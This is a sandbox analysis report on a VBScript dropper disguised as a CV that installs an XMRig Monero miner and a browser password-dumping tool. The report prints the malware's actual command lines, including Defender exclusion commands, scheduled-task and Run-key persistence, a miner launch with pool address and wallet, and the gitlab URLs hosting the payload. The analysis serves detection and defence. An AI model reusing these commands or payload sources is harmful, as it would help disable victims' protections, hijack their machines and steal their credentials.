Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
curriculum_vitae-copie_(1).vbs

Overview

General Information

Sample Name:curriculum_vitae-copie_(1).vbs
Analysis ID:1285225
MD5:9499fcf32b387ebb8fea0c9795e13e3f
SHA1:3c555461e2ded4795e4969c2d5676d34a6ef1653
SHA256:0086b0d726b7243e52d043f33e4addf1f794712192fd5131a212bd9257d147c7
Tags:vbs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Wscript called in batch mode (surpress errors)
Potential evasive VBS script found (sleep loop)
Found strings related to Crypto-Mining
Wscript starts Powershell (via cmd or directly)
Query firmware table information (likely to detect VMs)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Sample is not signed and drops a device driver
Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Yara detected WebBrowserPassView password recovery tool
Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
Deletes itself after installation
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates driver files
Enables security privileges
Drops PE files to the user directory
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6852 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 7144 cmdline: C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • cmd.exe (PID: 2220 cmdline: C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4008 cmdline: powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • 7g.exe (PID: 2912 cmdline: C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z MD5: 58FC6DE6C4E5D2FDA63565D54FEB9E75)
        • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4176 cmdline: C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2860 cmdline: schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • wscript.exe (PID: 5824 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 5972 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • mservice.exe (PID: 5164 cmdline: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title MD5: CFC0000B993A31C11EF58AC53837E4E1)
      • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wscript.exe (PID: 4580 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6416 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6584 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 6744 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 4312 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • wscript.exe (PID: 3420 cmdline: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 5868 cmdline: "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\WindowsUpdate\ps.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
    C:\Users\Public\WindowsUpdate\mservice.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\Public\WindowsUpdate\mservice.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4285b0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x429660:$s3: \\.\WinRing0_
      • 0x423430:$s4: pool_wallet
      • 0x41f288:$s5: cryptonight
      • 0x41f298:$s5: cryptonight
      • 0x41f2a8:$s5: cryptonight
      • 0x41f2b8:$s5: cryptonight
      • 0x41f2d0:$s5: cryptonight
      • 0x41f2e0:$s5: cryptonight
      • 0x41f2f0:$s5: cryptonight
      • 0x41f308:$s5: cryptonight
      • 0x41f318:$s5: cryptonight
      • 0x41f330:$s5: cryptonight
      • 0x41f348:$s5: cryptonight
      • 0x41f358:$s5: cryptonight
      • 0x41f368:$s5: cryptonight
      • 0x41f378:$s5: cryptonight
      • 0x41f390:$s5: cryptonight
      • 0x41f3a8:$s5: cryptonight
      • 0x41f3b8:$s5: cryptonight
      • 0x41f3c8:$s5: cryptonight
      C:\Users\Public\WindowsUpdate\mservice.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x427ab8:$x1: donate.ssl.xmrig.com
      • 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x4285b0:$s1: %s/%s (Windows NT %lu.%lu
              • 0x429660:$s3: \\.\WinRing0_
              • 0x423430:$s4: pool_wallet
              • 0x41f288:$s5: cryptonight
              • 0x41f298:$s5: cryptonight
              • 0x41f2a8:$s5: cryptonight
              • 0x41f2b8:$s5: cryptonight
              • 0x41f2d0:$s5: cryptonight
              • 0x41f2e0:$s5: cryptonight
              • 0x41f2f0:$s5: cryptonight
              • 0x41f308:$s5: cryptonight
              • 0x41f318:$s5: cryptonight
              • 0x41f330:$s5: cryptonight
              • 0x41f348:$s5: cryptonight
              • 0x41f358:$s5: cryptonight
              • 0x41f368:$s5: cryptonight
              • 0x41f378:$s5: cryptonight
              • 0x41f390:$s5: cryptonight
              • 0x41f3a8:$s5: cryptonight
              • 0x41f3b8:$s5: cryptonight
              • 0x41f3c8:$s5: cryptonight
              Click to see the 4 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.3.7g.exe.2fb7600.2.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                13.3.7g.exe.2f80000.1.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  13.3.7g.exe.2f80000.1.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    13.3.7g.exe.2f80000.1.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                    • 0x4285b0:$s1: %s/%s (Windows NT %lu.%lu
                    • 0x429660:$s3: \\.\WinRing0_
                    • 0x423430:$s4: pool_wallet
                    • 0x41f288:$s5: cryptonight
                    • 0x41f298:$s5: cryptonight
                    • 0x41f2a8:$s5: cryptonight
                    • 0x41f2b8:$s5: cryptonight
                    • 0x41f2d0:$s5: cryptonight
                    • 0x41f2e0:$s5: cryptonight
                    • 0x41f2f0:$s5: cryptonight
                    • 0x41f308:$s5: cryptonight
                    • 0x41f318:$s5: cryptonight
                    • 0x41f330:$s5: cryptonight
                    • 0x41f348:$s5: cryptonight
                    • 0x41f358:$s5: cryptonight
                    • 0x41f368:$s5: cryptonight
                    • 0x41f378:$s5: cryptonight
                    • 0x41f390:$s5: cryptonight
                    • 0x41f3a8:$s5: cryptonight
                    • 0x41f3b8:$s5: cryptonight
                    • 0x41f3c8:$s5: cryptonight
                    13.3.7g.exe.2f80000.1.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                    • 0x427ab8:$x1: donate.ssl.xmrig.com
                    • 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                    Click to see the 7 entries

                    Sigma Signatures

                    Bitcoin Miner

                    barindex
                    Sigma detected: Xmrig
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine|base64offset|contains: , Image: C:\Users\Public\WindowsUpdate\mservice.exe, NewProcessName: C:\Users\Public\WindowsUpdate\mservice.exe, OriginalFileName: C:\Users\Public\WindowsUpdate\mservice.exe, ParentCommandLine: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0308-18h00m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, ProcessId: 5164, ProcessName: mservice.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Register Wscript In Run Key
                    Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 7144, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Media Service

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: curriculum_vitae-copie_(1).vbsReversingLabs: Detection: 18%
                    Source: curriculum_vitae-copie_(1).vbsVirustotal: Detection: 20%Perma Link
                    Antivirus / Scanner detection for submitted sample
                    Source: curriculum_vitae-copie_(1).vbsAvira: detected
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\Public\WindowsUpdate\go.exeReversingLabs: Detection: 28%
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeReversingLabs: Detection: 83%
                    Source: C:\Users\Public\WindowsUpdate\ps.exeReversingLabs: Detection: 80%
                    Machine Learning detection for dropped file
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeJoe Sandbox ML: detected
                    Source: C:\Users\Public\WindowsUpdate\ps.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: 13.3.7g.exe.2f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.3.7g.exe.2fb7600.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.0.mservice.exe.7ff6c5050000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000015.00000000.731187915.00007FF6C5392000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7g.exe PID: 2912, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mservice.exe PID: 5164, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED
                    Found strings related to Crypto-Mining
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: unknownHTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49700 version: TLS 1.2
                    Source: Binary string: .pdbo` source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, go.exe.13.dr
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B165A1 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,13_2_00B165A1
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 49.12.202.237 443Jump to behavior
                    Source: C:\Windows\System32\wscript.exeDomain query: www.7-zip.org
                    Source: C:\Windows\System32\wscript.exeDomain query: gitlab.com
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
                    Potential malicious VBS script found (has network functionality)
                    Source: Initial file: .write L5S3xQ2higL5.responseBody
                    Source: Initial file: .savetofile L5YafRYO6L5, 2
                    Source: C:\Users\Public\7g.exeDropped file: .write L5xL5.responseBodyJump to dropped file
                    Source: C:\Users\Public\7g.exeDropped file: .savetofile L5sL5, 2 '//overwriteJump to dropped file
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                    Source: global trafficHTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cv1811930/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726396843.00000252701FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725940545.00000252701F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728634785.0000025270200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: wscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro6
                    Source: wscript.exe, 00000011.00000003.726386385.0000024C2F6E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726313946.0000024C2F6D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.726543417.0000024C2F6FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drString found in binary or memory: http://www.nirsoft.net/
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-cloudbilling.googleapis.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-cloudresourcemanager.googleapis.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content-compute.googleapis.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://content.googleapis.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                    Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.726396843.00000252701FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725381100.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.723244179.00000252701E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.725940545.00000252701F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.728634785.0000025270200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                    Source: wscript.exe, 00000005.00000003.678726662.00000252701E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/7
                    Source: wscript.exe, 00000005.00000002.728824562.0000025272950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.724831666.00000252704B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                    Source: wscript.exe, 00000005.00000003.678306865.000002527295B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                    Source: wscript.exe, 00000005.00000003.344943313.000002526FF09000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie_(1).vbsString found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=false
                    Source: wscript.exe, 00000000.00000003.348852456.0000026D0B921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=false5
                    Source: wscript.exe, 00000005.00000003.678726662.000002527022E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv1811930/cv/-/raw/main/gmail.7z?inline=falser
                    Source: wscript.exe, 00000019.00000002.754502079.0000025057FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/m
